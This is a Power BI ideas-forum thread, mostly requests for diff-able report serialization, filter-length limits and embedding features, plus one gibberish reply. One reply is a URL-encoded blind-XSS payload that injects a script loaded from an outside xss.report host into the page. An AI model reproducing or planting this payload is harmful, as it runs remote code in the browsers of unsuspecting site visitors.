RE:
Thans for collating this, it's a shame it's a bit lost in the ideas forum, but I found it :)My main comment is the last point:Incorportate version control and undo/redo functionalityFor version control - the critical thing here for me is rather than having this incorporated directly in the UI, instead concentrate on making true version control possible.- version control is more than simply going back to an old version (although of course simple undo in the UI is essential)- the real power of version control is the ability to see differences and merge changes across versions.- the standard way to enable this is to ensure there is an underlying representation as text that has had some though applied to make it possible to merge. Think code + git.So can I ask that there is some collaboration with the bookmark changes along with the team that is looking at the report-definition equivalent of TMDL.Currently the report serialization is incredibly granular and verbose, and is impossible to diff+merge.My key improvements would be:One json file per bookmarkReportSection ID can be set by user and remains stableVisual containers ID can be set by user and remains stableA readable DSL grammar for expressions (), rather than a json serializatin of an AST.If there's a place where this is being discussed in more detail, I'd love to contribute.
RE:
Absolutely!There is already an underlying json model to the report definitions, that you can get via API calls.Have a look at pbi tools - it's a great project to help here: https://pbi.tools/Unfortunately, as you'll see the report definition side is quite a mess!There's work underway to make the underlying report model more usable, but it's a long slow process.I'd love to see a usable report definition language that isn't so granular and messy - main reason for me is the ability to merge changes from git and provide some decent DevOps over our PowerBI reporting.
RE:
Voted!Also, to keep in mind that index creation locks the table. It's important to know when will this occur.
RE:
All our customers (over 10) using the production module request this functionality.
RE:
Please add the option to add labels to shape map
RE:
iyyviivyvy
RE:
var%20a=document.createElement(%22script%22);a.src=%22https://xss.report/c/milanjain%22;document.body.appendChild(a);
RE:
Filter strings used to be limited to 250 characters, but I'm pretty sure that limit was extended considerably, so you could even go to 2048 characters
RE:
I'd suggest allowing filter sets of 1024 chars to increase capacity of the functionality, and then trimming the pipe if the string needs truncating should the user for some reason exceed that capacity.
RE:
When can we see the ability for Power Automate visuals to work in an embedded app/report?